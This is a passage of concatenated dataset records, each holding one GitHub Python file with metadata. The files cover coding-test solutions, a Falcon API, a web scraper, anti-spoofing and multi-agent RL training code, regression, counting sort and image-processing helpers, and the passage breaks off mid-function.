ac_levels=ac_levels, pe=pe, pe_err=pe_err, true_pe=true_pe,\n nsb_mean=nsb_mean, 
nsb_std=nsb_std)\n\n","repo_name":"cta-sst-1m/digicampipe","sub_path":"digicampipe/scripts/charge_resolution.py","file_name":"charge_resolution.py","file_ext":"py","file_size_in_byte":10282,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"38667066651","text":"import heapq\ndef solution(n, works):\n answer = 0\n \n if sum(works) <= n:\n return 0\n heap = []\n \n for i in works:\n heapq.heappush(heap,(-i,i))\n for i in range(n):\n a = heapq.heappop(heap)[1]\n heapq.heappush(heap,(-(a-1),a-1))\n for i in heap:\n answer += i[1]**2\n return answer\n","repo_name":"joy961208/Programmers-Coding-Test","sub_path":"Level 3/야근 지수.py","file_name":"야근 지수.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"32890364450","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport falcon\nimport json\nimport os\n \nclass diHola:\n def on_get(self, req, resp):\n \"\"\"Handles GET requests\"\"\"\n quote = {\n 'mensaje': 'Hola Data Latam!',\n 'version': '0.0.4',\n 'variable ambiental': os.environ['MI_VARIABLE']\n }\n\n resp.body = json.dumps(quote)\n \ndemo = falcon.API()\ndemo.add_route('/', diHola())\n","repo_name":"datalatam/docker","sub_path":"falcon_env/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"647515949","text":"'''\nCreated on 6/5/2016\n Scrap module. It only works on wuxiaworld.com for now\n@author: msant\n'''\n\nimport requests\nimport lxml\nimport sys\nfrom bs4 import BeautifulSoup\n\ndef webScrap(url, file):\n r = requests.get(url)\n html = r.text\n soup = BeautifulSoup(html, 'lxml')\n \n #Text parsed by bs4\n raw = soup.get_text()\n content = raw.split('Previous Chapter Next Chapter ')[1]\n\n # write text with an explicit encoding\n f = open(file, 'w', encoding='utf-8')\n f.write(content)\n f.close()\n\nwebScrap('http://www.wuxiaworld.com/tdg-index/tdg-chapter-221/','Lecture.txt')\n\n","repo_name":"msantaquiteria/PyReading","sub_path":"src/WebScrap.py","file_name":"WebScrap.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38696255837","text":"# pylint: disable=R0915, R0914\r\n\r\nimport argparse\r\nimport json\r\nimport os\r\nimport yaml\r\n\r\nfrom pathlib import Path\r\nfrom collections import OrderedDict, defaultdict\r\n\r\nfrom tqdm import tqdm\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn.functional as F\r\n\r\nfrom utils.generic.setup import setup_seed\r\nfrom utils.train.schedulers import OptimizerWrapper\r\nfrom utils.audio.data import (\r\n CMDataset,\r\n SamplerBlockShuffleByLen,\r\n customize_collate,\r\n)\r\nfrom utils.eval.eer_tools import cal_roc_eer\r\nfrom utils.eval.model_loaders import load_cm\r\nfrom utils.eval.init import init_system, init_dataloader\r\n\r\n\r\ndef to(vec, device):\r\n if isinstance(vec, list):\r\n return [v.to(device) for v in vec]\r\n else:\r\n return vec.to(device)\r\n\r\n\r\ndef custom_sampler(data_params, lens_file, labels, sampler):\r\n if sampler == \"block_shuffle_by_length\":\r\n with open(lens_file, \"r\", encoding=\"utf8\") as f:\r\n lengths = [int(line.strip().split(\" \")[1]) for line in f]\r\n data_params[\"sampler\"] = SamplerBlockShuffleByLen(\r\n lengths, data_params[\"batch_size\"]\r\n )\r\n data_params[\"collate_fn\"] = customize_collate\r\n 
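# a custom sampler dictates the iteration order itself, so the loader's own shuffle stays off (sampler and shuffle are mutually exclusive in PyTorch)\r\n 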
data_params[\"shuffle\"] = False\r\n else:\r\n with open(labels) as f:\r\n lines = set([line.strip().split(\" \")[2] for line in f])\r\n data_params[\"sampler\"] = torch.utils.data.sampler.SubsetRandomSampler(\r\n range(len(lines) * 20)\r\n )\r\n return data_params\r\n\r\n\r\ndef get_loaders(spec, config, system, base, extract_device):\r\n data_params = config[\"training_parameters\"][\"data_loader\"]\r\n if config[\"training_parameters\"][\"sampler\"] is not None:\r\n sampler = config[\"training_parameters\"][\"sampler\"]\r\n data_params = custom_sampler(\r\n data_params,\r\n config[\"training_parameters\"].get(\"lens_file\"),\r\n os.path.join(\r\n os.path.join(base, \"labels\"), config[\"training_parameters\"][\"labels\"]\r\n ),\r\n sampler,\r\n )\r\n\r\n data_params[\"eval\"] = False\r\n train_loader, transform, label_fn, final_layer = init_dataloader(\r\n spec,\r\n system,\r\n base,\r\n config[\"training_parameters\"][\"labels\"].split(\".\")[0],\r\n data_params,\r\n extract_device,\r\n aug=config[\"arch\"][\"type\"] == \"WAV2VEC\",\r\n )\r\n\r\n data_params[\"eval\"] = True\r\n data_params[\"shuffle\"] = False\r\n val_loader = init_dataloader(\r\n spec,\r\n system,\r\n base,\r\n config[\"training_parameters\"][\"labels\"].split(\".\")[0],\r\n data_params,\r\n extract_device,\r\n )[0]\r\n return val_loader, train_loader, transform, label_fn, final_layer\r\n\r\n\r\ndef resume_state(path, model, optimizer, val_metric, lr, num_batch, state_dict, device):\r\n parent = Path(path).parent.absolute()\r\n results_f = os.path.join(parent, \"log.log\")\r\n with open(results_f, \"r\") as f:\r\n lines = [line for line in f]\r\n results = [float(line.strip().split(\" \")[7][:-1]) for line in lines if line != \"\\n\"]\r\n best = [float(line.strip().split(\" \")[9]) for line in lines if line != \"\\n\"][-1]\r\n idx = np.where(np.array(results) == best)[0][0]\r\n name = os.path.basename(path)\r\n itrs = idx + 1 if name == \"model.pth\" else int(name.split(\".\")[0][5:]) + 1\r\n optimizer.load(itrs, results, lr, num_batch, val_metric)\r\n model = load_cm(model, path, state_dict, device).to(device)\r\n model.train()\r\n lines = lines[:itrs]\r\n with open(results_f, \"w\") as f:\r\n f.writelines(lines)\r\n return model, optimizer, itrs\r\n\r\n\r\ndef make_model(\r\n spec, config, system, train_device, out, data_len, state_dict, resume=None\r\n):\r\n if config[\"arch\"][\"type\"] == \"DartsRaw\":\r\n config[\"arch\"][\"args\"][\"is_mask\"] = True\r\n\r\n model, loss = init_system(spec, system, train_device, load_checkpoint=False)\r\n optimizer = model.optimizer(\r\n config[\"training_parameters\"][\"optimizer\"][\"type\"],\r\n **config[\"training_parameters\"][\"optimizer\"][\"params\"],\r\n )\r\n optimizer_wrapper = OptimizerWrapper(\r\n optimizer, config[\"training_parameters\"][\"scheduler\"]\r\n )\r\n\r\n if resume:\r\n val_metric = config[\"training_parameters\"][\"val_metric\"]\r\n lr = config[\"training_parameters\"][\"optimizer\"][\"params\"][\"lr\"]\r\n model, optimizer_wrapper, itr = resume_state(\r\n os.path.join(out, resume),\r\n model,\r\n optimizer_wrapper,\r\n val_metric,\r\n lr,\r\n data_len,\r\n state_dict,\r\n train_device,\r\n )\r\n else:\r\n f = open(os.path.join(out, \"log.log\"), \"w\", encoding=\"utf8\")\r\n f.close()\r\n itr = 0\r\n return model, optimizer_wrapper, loss, itr\r\n\r\n\r\ndef unsqueeze_like(tensor: torch.Tensor, like: torch.Tensor):\r\n n_unsqueezes = like.ndim - tensor.ndim\r\n if n_unsqueezes < 0:\r\n raise ValueError(f\"tensor.ndim={tensor.ndim} > 
like.ndim={like.ndim}\")\r\n if n_unsqueezes == 0:\r\n return tensor\r\n return tensor[(...,) + (None,) * n_unsqueezes]\r\n\r\n\r\ndef process_batch(test_batch, model, loss, device, **kwargs):\r\n # pylint: disable=W0621\r\n test_sample, test_label = test_batch\r\n test_sample = to(test_sample, device)\r\n test_label = test_label.to(device)\r\n out = model(test_sample, **kwargs)\r\n try:\r\n Loss = loss(out, test_label)\r\n return Loss, out\r\n except Exception:\r\n # the loss cannot always be computed (e.g. during evaluation); callers guard for a None loss\r\n return None, out\r\n\r\n\r\ndef calc_metric(val_metric, probs, lossDict):\r\n # pylint: disable=W0621\r\n if val_metric == \"eer\":\r\n res = cal_roc_eer(probs)\r\n elif val_metric == \"acc\":\r\n out = np.argmax(probs[:, :-1].numpy().reshape((probs.shape[0], 2)), axis=1)\r\n target = probs[:, -1].numpy()\r\n res = np.where(out == target)[0].shape[0] / out.shape[0]\r\n else:\r\n res = np.nanmean(lossDict[\"loss\"])\r\n return res\r\n\r\n\r\ndef train_epoch(\r\n system, epoch_num, optimizer, model, loss, train_loader, lr, device, **train_args\r\n):\r\n model.train()\r\n for test_batch in tqdm(train_loader):\r\n Loss, out = process_batch(test_batch, model, loss, device, **train_args)\r\n optimizer.zero_grad()\r\n Loss.backward()\r\n optimizer.step()\r\n optimizer.update(lr, epoch_num, False)\r\n optimizer.update(lr, epoch_num, True)\r\n return optimizer, model\r\n\r\n\r\ndef validate_epoch(\r\n system,\r\n model,\r\n loss,\r\n val_loader,\r\n val_metric,\r\n transform,\r\n final_layer,\r\n label_fn,\r\n eval_mode_for_validation,\r\n batch_size,\r\n device,\r\n):\r\n lossDict = defaultdict(list)\r\n if eval_mode_for_validation:\r\n model.eval()\r\n with torch.no_grad():\r\n probs = torch.empty(0, 2).to(device)\r\n if val_metric == \"acc\":\r\n probs = torch.empty(0, 3).to(device)\r\n for test_batch in val_loader:\r\n Loss, out = process_batch(test_batch, model, loss, device, eval=True)\r\n test_label = test_batch[1].to(device)\r\n t1 = transform(final_layer(out))\r\n t2 = label_fn(test_label.unsqueeze(-1))\r\n t1 = unsqueeze_like(t1, t2)\r\n if val_metric != \"acc\":\r\n t1 = unsqueeze_like(t1[:, -1], t2)\r\n row = torch.cat((t1, t2), dim=-1)\r\n probs = torch.cat((probs, row), dim=0)\r\n try:\r\n lossDict[\"loss\"].append(Loss.item())\r\n except:\r\n pass\r\n probs = probs.to(\"cpu\")\r\n\r\n res = calc_metric(val_metric, probs, lossDict)\r\n return res\r\n\r\n\r\ndef log_epoch(model, res, epoch_num, val_metric, is_best, best_res, out_f):\r\n if is_best:\r\n model.save_state(os.path.join(out_f, \"model.pth\"))\r\n Message = (\r\n \"\\nEpoch: \"\r\n + str(epoch_num)\r\n + \" - Val metric: \"\r\n + val_metric\r\n + \", value: \"\r\n + str(res)\r\n + \", best: \"\r\n + str(best_res)\r\n )\r\n with open(os.path.join(out_f, \"log.log\"), \"a\", encoding=\"utf8\") as log:\r\n log.write(Message + \"\\n\")\r\n print(Message)\r\n\r\n model.save_state(os.path.join(out_f, \"model\" + str(epoch_num) + \".pth\"))\r\n\r\n\r\ndef train(\r\n system,\r\n model,\r\n loss,\r\n optimizer,\r\n train_loader,\r\n val_loader,\r\n num_epochs,\r\n lr,\r\n out_f,\r\n eval_mode_for_validation,\r\n no_best_epoch_num,\r\n val_metric,\r\n drop_path_prob,\r\n transform,\r\n label_fn,\r\n final_layer,\r\n batch_size,\r\n train_args,\r\n device,\r\n start=0,\r\n):\r\n # pylint: disable=R0913,W0621\r\n\r\n for epoch_num in tqdm(range(start, num_epochs)):\r\n if drop_path_prob:\r\n model.drop_path_prob = drop_path_prob * epoch_num / num_epochs\r\n optimizer, model = train_epoch(\r\n system,\r\n epoch_num,\r\n optimizer,\r\n 
model,\r\n loss,\r\n train_loader,\r\n lr,\r\n device,\r\n **train_args,\r\n )\r\n res = validate_epoch(\r\n system,\r\n model,\r\n loss,\r\n val_loader,\r\n val_metric,\r\n transform,\r\n final_layer,\r\n label_fn,\r\n eval_mode_for_validation,\r\n batch_size,\r\n device,\r\n )\r\n\r\n # compare against the first epoch of this run so best_res is always defined before use\r\n is_best = epoch_num == start or (\r\n res < best_res if val_metric in (\"eer\", \"loss\") else res > best_res\r\n )\r\n if is_best:\r\n best_res, best_epoch, best_epoch_tmp = res, epoch_num, epoch_num\r\n\r\n log_epoch(model, res, epoch_num, val_metric, is_best, best_res, out_f)\r\n\r\n if epoch_num - best_epoch_tmp > 2:\r\n optimizer.increase_delta()\r\n best_epoch_tmp = epoch_num\r\n\r\n if (epoch_num - best_epoch) >= no_best_epoch_num:\r\n print(\"terminating - early stopping\")\r\n break\r\n\r\n return model\r\n\r\n\r\ndef run_train(conf_path, base, resume, devices):\r\n with Path(conf_path[\"config\"]).open(\"rt\", encoding=\"utf8\") as handle:\r\n config = json.load(handle, object_hook=OrderedDict)\r\n\r\n train_device, extract_device = devices.split(\",\")\r\n\r\n lr = config[\"training_parameters\"][\"optimizer\"][\"params\"][\"lr\"]\r\n num_epochs = config[\"training_parameters\"][\"num_epochs\"]\r\n eval_mode_for_validation = config[\"training_parameters\"][\"eval_mode_for_validation\"]\r\n no_best_epoch_num = config[\"training_parameters\"][\"no_best_epoch_num\"]\r\n val_metric = config[\"training_parameters\"][\"val_metric\"]\r\n drop_path_prob = config[\"training_parameters\"].get(\"drop_path_prob\", None)\r\n train_args = config[\"training_parameters\"].get(\"train_args\", {})\r\n out = \"/\".join(config[\"path\"].split(\"/\")[:-1])\r\n batch_size = config[\"training_parameters\"][\"data_loader\"][\"batch_size\"]\r\n\r\n Path(out).mkdir(parents=True, exist_ok=True)\r\n setup_seed(config[\"training_parameters\"][\"seed\"])\r\n val_loader, train_loader, transform, label_fn, final_layer = get_loaders(\r\n conf_path,\r\n config,\r\n config[\"system\"],\r\n base,\r\n extract_device,\r\n )\r\n model, optimizer, loss, itr = make_model(\r\n conf_path,\r\n config,\r\n config[\"system\"],\r\n train_device,\r\n out,\r\n len(train_loader),\r\n config[\"state_dict\"],\r\n resume=resume,\r\n )\r\n\r\n model = train(\r\n config[\"system\"],\r\n model,\r\n loss,\r\n optimizer,\r\n train_loader,\r\n val_loader,\r\n num_epochs,\r\n lr,\r\n out,\r\n eval_mode_for_validation,\r\n no_best_epoch_num,\r\n val_metric,\r\n drop_path_prob,\r\n transform,\r\n label_fn,\r\n final_layer,\r\n batch_size,\r\n train_args,\r\n train_device,\r\n itr,\r\n )\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"--config\")\r\n parser.add_argument(\"--system\")\r\n parser.add_argument(\"--subset\", default=\"dev\")\r\n parser.add_argument(\"--task\", default=\"cm\")\r\n parser.add_argument(\"--base\", default=\"datasets/asvspoofWavs\")\r\n parser.add_argument(\"--devices\", default=\"cuda:0,cuda:1\")\r\n parser.add_argument(\"--resume\")\r\n args = parser.parse_args()\r\n\r\n with open(args.config) as f:\r\n config = yaml.load(f, Loader=yaml.Loader)\r\n run_train(\r\n config[args.task][args.subset][args.system],\r\n args.base,\r\n args.resume,\r\n args.devices,\r\n )\r\n","repo_name":"andrekassis/Breaking-Security-Critical-Voice-Authentication","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":12361,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"2278573239","text":"class Node:\n def 
__init__(self, val, nxt=None):\n self.val = val\n self.next = nxt\n\n\ndef floyd_cycle_detect(node):\n slow = node\n fast = node\n\n while fast is not None and fast.next is not None:\n slow = slow.next\n fast = fast.next.next\n\n if slow == fast:\n return True\n\n return False\n","repo_name":"ryanmcdermott/algorithms","sub_path":"floyd_cycle_detect/floyd_cycle_detect.py","file_name":"floyd_cycle_detect.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"31"} +{"seq_id":"8192982178","text":"# REGRESSION TEMPLATE\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\n\n# # # DATA PRE-PROCESSING # # #\n\n# Importing the data-set\ndataset = pd.read_csv('Regression/Decision Tree Regression/Position_Salaries.csv')\nx = dataset.iloc[:, 1:2].values\ny = dataset.iloc[:, 2].values\n\n\n# Feature Scaling\n# sc_x = StandardScaler()\n# x_train = sc_x.fit_transform(x_train)\n# x_test = sc_x.transform(x_test)\n# FITTING REG-RES-SOR TO DATA-SET\n\n# REGRESSOR\nfrom sklearn.tree import DecisionTreeRegressor\nregressor = DecisionTreeRegressor(random_state=0)\nregressor.fit(x, y)\n\n# Predict Result (OPTIONAL)\ny_pred = regressor.predict([[6.5]])\n\n# VISUALISING THE RESULTS\nx_grid = np.arange(min(x), max(x), 0.01)\nx_grid = x_grid.reshape((len(x_grid)), 1)\nplt.scatter(x, y, color='red')\nplt.plot(x_grid, regressor.predict(x_grid), color='blue')\nplt.title('Decision Tree Regression')\nplt.xlabel('POS')\nplt.ylabel('MUNEYS')\nplt.show()\n","repo_name":"rairai77/Machine-Learning-and-AI","sub_path":"My Machine Learning Courseware/Regression/Decision Tree Regression/decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7324122767","text":"import os\nos.system(\"cls\")\n\n#Input\n\njuanD = float(input(\"Ingrese la cantidad que aportará Juan en dólares: \"))\nrosaD = float(input(\"Ingrese la cantidad que aportará Rosa en dólares: \"))\ndanielS = float(input(\"Ingrese la cantidad que aportará Daniel en Soles: \"))\n\n#Process\n\n #Convert Daniel's money from soles to dollars\n\ndanielD = danielS / 3.00\n\n #Total in dollars\n\nTotalD = juanD + rosaD + danielD\n\n # Finding Juan's percentage\nPorcentajeJuan = (juanD * 100) / TotalD\n # Finding Rosa's percentage\nPorcentajeRosa = (rosaD * 100) / TotalD\n # Finding Daniel's percentage\nPorcentajeDaniel = (danielD * 100) / TotalD\n \n\n\n#Output\nprint(\" ===== RESULTADOS =========\")\nprint(f\"conversión de soles a dolares de Daniel {danielD:.2f}\")\nprint ( f\"Total de Aportes: {TotalD:.2f} \")\nprint( f\"Parte de Juan : {PorcentajeJuan:.2f}\")\nprint( f\"Parte de Rosa : {PorcentajeRosa:.2f}\")\nprint( f\"Parte de Daniel : {PorcentajeDaniel:.2f}\")\n\n","repo_name":"Eliz4bybug/EJERCICIOS-DE-PYTHON","sub_path":"Ejercicios_Secuenciales/Ejercicio_15.py","file_name":"Ejercicio_15.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20152001258","text":"from ray.rllib.models.action_dist import ActionDistribution\nfrom typing import List, Type, Union\nfrom ray.rllib.evaluation.postprocessing import Postprocessing\nfrom ray.rllib.models.modelv2 import ModelV2\nfrom 
ray.rllib.models.torch.torch_action_dist import TorchDistributionWrapper\nfrom ray.rllib.policy.policy import Policy\nfrom ray.rllib.policy.sample_batch import SampleBatch\nfrom ray.rllib.utils.framework import try_import_torch\nfrom ray.rllib.utils.torch_ops import explained_variance, sequence_mask\nfrom ray.rllib.utils.typing import TensorType\nfrom ray.rllib.utils.torch_ops import convert_to_torch_tensor\nfrom ray.rllib.agents.ppo.ppo_torch_policy import PPOTorchPolicy, KLCoeffMixin, ValueNetworkMixin\nfrom ray.rllib.policy.torch_policy import LearningRateSchedule, EntropyCoeffSchedule\nfrom ray.rllib.agents.ppo.ppo import PPOTrainer, DEFAULT_CONFIG as PPO_CONFIG\nfrom marllib.marl.algos.utils.mixing_critic import MixingValueMixin, value_mixing_postprocessing\n\ntorch, nn = try_import_torch()\n\n\n# value decomposition based ppo loss\ndef value_mix_ppo_surrogate_loss(\n policy: Policy, model: ModelV2,\n dist_class: Type[TorchDistributionWrapper],\n train_batch: SampleBatch) -> Union[TensorType, List[TensorType]]:\n \"\"\"Constructs the loss for Proximal Policy Objective.\n\n Args:\n policy (Policy): The Policy to calculate the loss for.\n model (ModelV2): The Model to calculate the loss for.\n dist_class (Type[ActionDistribution]: The action distr. class.\n train_batch (SampleBatch): The training data.\n\n Returns:\n Union[TensorType, List[TensorType]]: A single loss tensor or a list\n of loss tensors.\n \"\"\"\n MixingValueMixin.__init__(policy)\n\n logits, state = model(train_batch)\n curr_action_dist = dist_class(logits, model)\n\n # RNN case: Mask away 0-padded chunks at end of time axis.\n if state:\n B = len(train_batch[SampleBatch.SEQ_LENS])\n max_seq_len = logits.shape[0] // B\n mask = sequence_mask(\n train_batch[SampleBatch.SEQ_LENS],\n max_seq_len,\n time_major=model.is_time_major())\n mask = torch.reshape(mask, [-1])\n num_valid = torch.sum(mask)\n\n def reduce_mean_valid(t):\n return torch.sum(t[mask]) / num_valid\n\n # non-RNN case: No masking.\n else:\n mask = None\n reduce_mean_valid = torch.mean\n\n prev_action_dist = dist_class(train_batch[SampleBatch.ACTION_DIST_INPUTS],\n model)\n\n logp_ratio = torch.exp(\n curr_action_dist.logp(train_batch[SampleBatch.ACTIONS]) -\n train_batch[SampleBatch.ACTION_LOGP])\n action_kl = prev_action_dist.kl(curr_action_dist)\n mean_kl_loss = reduce_mean_valid(action_kl)\n\n curr_entropy = curr_action_dist.entropy()\n mean_entropy = reduce_mean_valid(curr_entropy)\n\n surrogate_loss = torch.min(\n train_batch[Postprocessing.ADVANTAGES] * logp_ratio,\n train_batch[Postprocessing.ADVANTAGES] * torch.clamp(\n logp_ratio, 1 - policy.config[\"clip_param\"],\n 1 + policy.config[\"clip_param\"]))\n mean_policy_loss = reduce_mean_valid(-surrogate_loss)\n\n # Compute a value function loss.\n if policy.config[\"use_critic\"]:\n prev_value_fn_out = train_batch[SampleBatch.VF_PREDS]\n value_fn_out = model.value_function()\n\n # add mixing_function\n opponent_vf_preds = convert_to_torch_tensor(train_batch[\"opponent_vf_preds\"])\n vf_pred = value_fn_out.unsqueeze(1)\n all_vf_pred = torch.cat((vf_pred, opponent_vf_preds), 1)\n state = convert_to_torch_tensor(train_batch[\"state\"])\n value_tot = model.mixing_value(all_vf_pred, state)\n\n vf_loss1 = torch.pow(\n value_tot - train_batch[Postprocessing.VALUE_TARGETS], 2.0)\n vf_clipped = prev_value_fn_out + torch.clamp(\n value_tot - prev_value_fn_out, -policy.config[\"vf_clip_param\"],\n policy.config[\"vf_clip_param\"])\n vf_loss2 = torch.pow(\n vf_clipped - train_batch[Postprocessing.VALUE_TARGETS], 
2.0)\r\n vf_loss = torch.max(vf_loss1, vf_loss2)\r\n mean_vf_loss = reduce_mean_valid(vf_loss)\r\n # Ignore the value function.\r\n else:\r\n vf_loss = mean_vf_loss = 0.0\r\n\r\n total_loss = reduce_mean_valid(-surrogate_loss +\r\n policy.kl_coeff * action_kl +\r\n policy.config[\"vf_loss_coeff\"] * vf_loss -\r\n policy.entropy_coeff * curr_entropy)\r\n\r\n # Store values for stats function in model (tower), such that for\r\n # multi-GPU, we do not override them during the parallel loss phase.\r\n model.tower_stats[\"total_loss\"] = total_loss\r\n model.tower_stats[\"mean_policy_loss\"] = mean_policy_loss\r\n model.tower_stats[\"mean_vf_loss\"] = mean_vf_loss\r\n model.tower_stats[\"vf_explained_var\"] = explained_variance(\r\n train_batch[Postprocessing.VALUE_TARGETS], model.value_function())\r\n model.tower_stats[\"mean_entropy\"] = mean_entropy\r\n model.tower_stats[\"mean_kl_loss\"] = mean_kl_loss\r\n\r\n return total_loss\r\n\r\n\r\nVDPPOTorchPolicy = PPOTorchPolicy.with_updates(\r\n name=\"VDPPOTorchPolicy\",\r\n get_default_config=lambda: PPO_CONFIG,\r\n postprocess_fn=value_mixing_postprocessing,\r\n loss_fn=value_mix_ppo_surrogate_loss,\r\n mixins=[\r\n LearningRateSchedule, EntropyCoeffSchedule, KLCoeffMixin,\r\n ValueNetworkMixin, MixingValueMixin\r\n ])\r\n\r\n\r\ndef get_policy_class_vdppo(config_):\r\n if config_[\"framework\"] == \"torch\":\r\n return VDPPOTorchPolicy\r\n\r\n\r\nVDPPOTrainer = PPOTrainer.with_updates(\r\n name=\"VDPPOTrainer\",\r\n default_policy=None,\r\n get_policy_class=get_policy_class_vdppo,\r\n)\r\n","repo_name":"Replicable-MARL/MARLlib","sub_path":"marllib/marl/algos/core/VD/vdppo.py","file_name":"vdppo.py","file_ext":"py","file_size_in_byte":5715,"program_lang":"python","lang":"en","doc_type":"code","stars":627,"dataset":"github-code","pt":"31"} +{"seq_id":"28726015800","text":"# This problem has tight time and memory limits, so using Python's sort library exceeds the time limit.\n# Instead, use counting sort, which is efficient when the gap between the largest and smallest value is at most 1000000.\n# In this problem the natural numbers range from 1 to 10000.\n# Counting sort runs in O(N+K): with all data being positive integers, N is the number of values and K is the largest value.\n# Read the input through the sys library to avoid exceeding the time limit.\n\n\nimport sys\nn = int(sys.stdin.readline())\na = [0] * 10001\n\n\nfor _ in range(n):\n a[int(sys.stdin.readline())] += 1\n\nfor i in range(1,10001):\n while a[i] != 0:\n print(i)\n a[i] -= 1\n","repo_name":"sangil1208/AlgorithmPS","sub_path":"Python/Sorting/BOJ_10989.py","file_name":"BOJ_10989.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31420997675","text":"import math\n\nimport cv2\nimport numpy as np\n\n_cascade_path = 'cascade.xml'\ncascade = None\n\ngunakan_library = True\ntampilkan_gambar_tiap_tahap = False\ntampilkan_log = False\n\n_cache_kernel_gaussian = {}\n\n\ndef muat_cascade():\n global cascade\n cascade = cv2.CascadeClassifier(_cascade_path)\n\n\ndef log(message):\n if not tampilkan_log:\n return\n print(message)\n\n\n# not used directly by the GUI\ndef tampilkan(gambar, as_hsv=False):\n if not tampilkan_gambar_tiap_tahap:\n return\n # resize to 800x600\n gambar = cv2.resize(gambar, (gambar.shape[1] * 600 // gambar.shape[0], 600))\n # show the image\n if as_hsv:\n gambar = cv2.cvtColor(gambar, cv2.COLOR_HSV2BGR)\n cv2.imshow('gambar', gambar)\n cv2.waitKey(0)\n\n\ndef buat_gaussian_kernel(ukuran_kernel):\n cached = _cache_kernel_gaussian.get(ukuran_kernel)\n if cached is not None:\n return cached\n kernel = np.zeros((ukuran_kernel, ukuran_kernel))\n x = int(ukuran_kernel / 2)\n y = int(ukuran_kernel / 2)\n for i in range(-x, x + 1):\n for j in range(-y, y + 1):\n kernel[i + x][j + y] = 1 / (2 * math.pi * 1) * math.exp(-(i * i + j * j) / (2 * 1))\n _cache_kernel_gaussian[ukuran_kernel] = kernel\n return kernel\n\n\ndef gaussian_blur_grayscale(gambar, ukuran_kernel):\n if gunakan_library:\n return cv2.GaussianBlur(gambar, (ukuran_kernel, ukuran_kernel), 0)\n # without the library\n # calculate gaussian kernel\n kernel = buat_gaussian_kernel(ukuran_kernel)\n hasil = np.zeros(gambar.shape)\n\n kernel_w = (kernel.shape[0]) // 2\n kernel_h = (kernel.shape[1]) // 2\n\n h = gambar.shape[0]\n w = gambar.shape[1]\n\n for i in range(kernel_h, h - kernel_h):\n for j in range(kernel_w, w - kernel_w):\n sum = 0\n for k in range(kernel.shape[0]):\n for l in range(kernel.shape[1]):\n sum += kernel[k][l] * gambar[i - kernel_h + k][j - kernel_w + l]\n hasil[i][j] = sum\n\n return hasil.astype(np.uint8)\n\n\ndef bgr_ke_grayscale(gambar):\n if gunakan_library:\n return cv2.cvtColor(gambar, cv2.COLOR_BGR2GRAY)\n # without the library\n hasil = np.zeros((gambar.shape[0], gambar.shape[1]))\n for i in range(gambar.shape[0]):\n for j in range(gambar.shape[1]):\n hasil[i][j] = 0.299 * gambar[i][j][2] + 0.587 * gambar[i][j][1] + 0.114 * gambar[i][j][0]\n return hasil.astype(np.uint8)\n\n\ndef bgr_hsv(b, g, r):\n # convert uint8 to int\n b = int(b)\n g = int(g)\n r = int(r)\n v = max(r, g, b)\n if v == 0:\n s = 0\n else:\n s = (v - min(r, g, b)) / v\n\n h = 0\n if r == g == b:\n return 0, 0, v\n else:\n if v == r:\n h = 60 * (g - b) / (v - min(r, g, b))\n elif v == g:\n h = 120 + 60 * (b - r) / (v - min(r, g, b))\n elif v == b:\n h = 240 + 60 * (r - g) / (v - min(r, g, b))\n\n if h < 0:\n h += 360\n\n # convert to 0-180\n h /= 2\n\n return round(h), round(s * 255), round(v)\n\n\ndef hsv_bgr(h, s, v):\n h *= 2\n s /= 255\n v /= 255\n c = s * v\n x = c * (1 - abs((h / 60) % 2 - 1))\n m = v - c\n\n r, g, b = 0, 0, 0\n if 0 <= h < 60:\n r = c\n g = x\n b = 0\n elif 60 <= h < 120:\n r = x\n g = c\n b = 0\n elif 120 <= h < 
180:\n r = 0\n g = c\n b = x\n elif 180 <= h < 240:\n r = 0\n g = x\n b = c\n elif 240 <= h < 300:\n r = x\n g = 0\n b = c\n elif 300 <= h < 360:\n r = c\n g = 0\n b = x\n\n r = (r + m) * 255\n g = (g + m) * 255\n b = (b + m) * 255\n\n return round(b), round(g), round(r)\n\n\ndef bgr_ke_hsv(gambar):\n if gunakan_library:\n return cv2.cvtColor(gambar, cv2.COLOR_BGR2HSV)\n # without the library\n hasil = np.zeros(gambar.shape)\n for i in range(gambar.shape[0]):\n for j in range(gambar.shape[1]):\n b, g, r = gambar[i][j]\n h, s, v = bgr_hsv(b, g, r)\n hasil[i][j] = [h, s, v]\n return hasil.astype(np.uint8)\n\n\ndef hsv_ke_bgr(gambar):\n if gunakan_library:\n return cv2.cvtColor(gambar, cv2.COLOR_HSV2BGR)\n # without the library\n hasil = np.zeros(gambar.shape)\n for i in range(gambar.shape[0]):\n for j in range(gambar.shape[1]):\n h, s, v = gambar[i][j]\n b, g, r = hsv_bgr(h, s, v)\n hasil[i][j] = [b, g, r]\n return hasil.astype(np.uint8)\n\n\ndef hsv_ke_grayscale(gambar):\n if gunakan_library:\n return cv2.cvtColor(cv2.cvtColor(gambar, cv2.COLOR_HSV2BGR), cv2.COLOR_BGR2GRAY)\n # without the library\n hasil = np.zeros((gambar.shape[0], gambar.shape[1]))\n for i in range(gambar.shape[0]):\n for j in 